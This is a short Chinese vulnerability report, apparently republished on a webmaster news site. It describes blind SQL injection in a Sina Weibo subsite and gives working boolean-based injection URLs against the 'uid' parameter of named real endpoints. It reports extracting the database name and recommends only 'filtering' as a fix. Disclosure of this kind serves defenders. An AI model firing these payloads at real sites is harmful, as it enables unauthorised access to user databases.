新浪微博某分站多处SQL注射下载

新浪微博某分站多处SQL注入漏洞盲注点

注入点1:
http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=1%29,1,%28select%201%20union%20select%202%29%29

http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=2%29,1,%28select%201%20union%20select%202%29%29

经简单测试,得出数据库 database() 为:jcsport,其它没测。

其它注入点:

http://cai.weibo.com/pc.php/api/user/matchbet?page=1&size=10&uid=10057693&type=rooms&datetype=1

uid注入

修复方案:

过滤

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细